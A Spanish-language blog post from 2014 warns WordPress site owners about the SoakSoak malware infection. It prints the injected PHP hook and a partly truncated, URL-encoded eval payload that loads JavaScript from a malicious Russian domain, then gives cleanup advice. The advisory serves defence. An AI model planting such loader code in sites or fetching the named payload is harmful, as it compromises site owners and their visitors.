El malware SoakSoak infecta decenas de miles de WordPress

Publicado por Fernando Tellado el 15 Dic, 2014

Hace horas que se está reportando que hay decenas de miles de sitios WordPress comprometidos por infección del malware conocido como SoakSoak.

Muchos usuarios se están enterando cuando los sistemas de detección de Google no dejan acceder a sus sitios, pero es un aviso para todos.

Lo que sucede es que el atacante accede al fichero wp-includes/template-loader.php e incluye lo siguiente:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

<?php

function FuncQueueObject()

{

wp_enqueue_script("swfobject");

}

add_action("wp_enqueue_scripts", 'FuncQueueObject');

Esto provoca que se añada lo siguiente al archivo wp-includes/js/swobject.js:
eval(decodeURIComponent(“%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B”));

Este malware, al descodificarse, carga un malware en javascript desde el dominio SoakSoak.ru, en concreto este archivo: hXXp://soaksoak.ru/xteas/code

Si ya estás infectado la solución de urgencia es sustituir los archivos comprometidos por unos limpios descargados desde WordPress.org, para a continuación cargar una versión completa limpia tanto de WordPress como de plugins y temas.

Una vez hecho esto, ahora sí, instala algún plugin de seguridad como WordFence o el que más te guste, pero que tenga firewall integrado y detección temprana de archivos modificados.

Si quieres comprobar si estás infectado prueba en este comprobador de seguridad online gratuito.

AVISO: esta publicación es de hace dos años o más. Si es un código o un plugin podría no funcionar en las últimas versiones de WordPress, y si es una noticia podría estar ya obsoleta. Luego no digas que no te hemos avisado.